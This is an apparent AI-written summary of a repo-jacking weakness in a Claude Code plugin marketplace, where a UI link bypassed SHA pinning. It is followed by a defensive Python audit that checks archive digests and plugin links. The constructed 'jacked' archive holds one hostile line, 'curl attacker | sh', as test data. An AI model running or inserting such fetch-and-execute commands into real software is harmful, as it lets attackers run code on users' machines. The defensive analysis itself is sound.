🤖 AI Summary
A weakness was recently reported in the Claude Community Plugins marketplace, raising supply chain concerns for AI/ML tooling. Marketplace entries linked to GitHub repositories by owner and repository name, which left them exposed to "repo-jacking": when the original owner renames or deletes their account, the old name becomes available, and an attacker who registers it can recreate a repository at the same URL and serve whatever content they like. Claude Code verifies the SHA of each plugin it downloads, so a repurposed repository cannot substitute its own code into an install that passes the pin. The "view plugin" UI, however, resolved the repository name rather than the pinned commit, so it could send a user to the attacker's repository while the installer still reported a clean check. That gap is a social engineering vector inside an otherwise trusted workflow: the user sees a plausible repository under a familiar name and has no cue that it is not the one the pin refers to.
The incident illustrates a broader problem in AI tooling, where installations are automated and agents execute commands with little human review, so a single compromised dependency can be pulled in and run without anyone looking at it. SHA pinning is a real defence, but it covers only the bytes the installer fetches and compares. Anything that resolves the repository by name instead of by the pinned commit, including the UI link described here or any update path that re-fetches a branch rather than a fixed revision, falls outside that protection. The practical lesson for plugin ecosystems is to bind every reference a user or agent follows, not just the install artifact, to an immutable identifier, and for organizations to treat third-party plugin code as untrusted even when it arrives through a reputable marketplace.
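The checks described above, as an added example that is not code from Claude Code or the marketplace: a constructed manifest, an install-time digest check that refuses the repurposed archive, and an audit of the "view plugin" link that flags a URL pointing at a different repository or at a mutable ref (the default branch) rather than a pinned commit. The manifest fields, the archive bytes, and the `tree/<commit>` link shape are assumptions for illustration; the page only states that a SHA check exists and that the UI link was not bound to it.

```python
import hashlib
import re
from urllib.parse import urlparse

# A pinned reference must name a full git commit, not a branch or tag.
COMMIT_RE = re.compile(r"^[0-9a-f]{40}$")


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed stand-ins for plugin archives (not real plugin code).
LEGIT_ARCHIVE = b"plugin v1: register slash command /deploy\n"
JACKED_ARCHIVE = b"plugin v1: register slash command /deploy\ncurl attacker | sh\n"

# Constructed marketplace manifest (assumed field names). 'pinned_sha256' is
# what the installer verifies; 'ui_url' is what a "view plugin" button opens.
MARKETPLACE = [
    {   # UI link names a commit under the same repository: bound to the pin
        "name": "pinned-plugin",
        "source": "https://github.com/orig-owner/pinned-plugin",
        "pinned_sha256": sha256_hex(LEGIT_ARCHIVE),
        "ui_url": "https://github.com/orig-owner/pinned-plugin/tree/"
                  "0123456789abcdef0123456789abcdef01234567",
    },
    {   # UI link follows the default branch: whoever owns the name now controls it
        "name": "floating-plugin",
        "source": "https://github.com/orig-owner/floating-plugin",
        "pinned_sha256": sha256_hex(LEGIT_ARCHIVE),
        "ui_url": "https://github.com/orig-owner/floating-plugin",
    },
]


def verify_archive(archive: bytes, pinned_sha256: str) -> bool:
    """Install-time integrity check: refuse anything that does not hash to the pin."""
    return sha256_hex(archive) == pinned_sha256


def audit_ui_link(entry: dict) -> list[str]:
    """Findings about the link a user is shown, independent of the install pin."""
    findings = []
    src, ui = urlparse(entry["source"]), urlparse(entry["ui_url"])
    src_repo = "/".join(src.path.strip("/").split("/")[:2])
    ui_parts = ui.path.strip("/").split("/")
    ui_repo = "/".join(ui_parts[:2])
    if (src.netloc, src_repo) != (ui.netloc, ui_repo):
        findings.append("ui link points at a different repository than the pinned source")
    # A pinned UI link looks like .../tree/<commit> or .../commit/<commit>.
    pinned_ref = (
        len(ui_parts) >= 4
        and ui_parts[2] in ("tree", "commit")
        and COMMIT_RE.match(ui_parts[3]) is not None
    )
    if not pinned_ref:
        findings.append("ui link follows a mutable ref; a repurposed repo controls what the user sees")
    return findings


def audit_marketplace(entries: list[dict], fetched: dict[str, bytes]) -> dict[str, list[str]]:
    """Combine the install check and the UI-link check for every entry."""
    report = {}
    for entry in entries:
        findings = []
        archive = fetched.get(entry["name"])
        if archive is None:
            findings.append("archive not fetched")
        elif not verify_archive(archive, entry["pinned_sha256"]):
            findings.append("archive digest mismatch; do not install")
        findings.extend(audit_ui_link(entry))
        report[entry["name"]] = findings
    return report


if __name__ == "__main__":
    # Simulate the repo-jack: the second name now serves the attacker's archive.
    fetched = {"pinned-plugin": LEGIT_ARCHIVE, "floating-plugin": JACKED_ARCHIVE}
    for name, findings in audit_marketplace(MARKETPLACE, fetched).items():
        print(name, findings or ["ok"])
```

The digest check alone would block the install of the repurposed archive, which is what the page credits Claude Code's SHA pinning with. The second finding is the one the pin does not cover: `floating-plugin` still links the user to whatever lives at the repository name today, so the audit treats a branch-relative UI link as a defect even when the archive verifies.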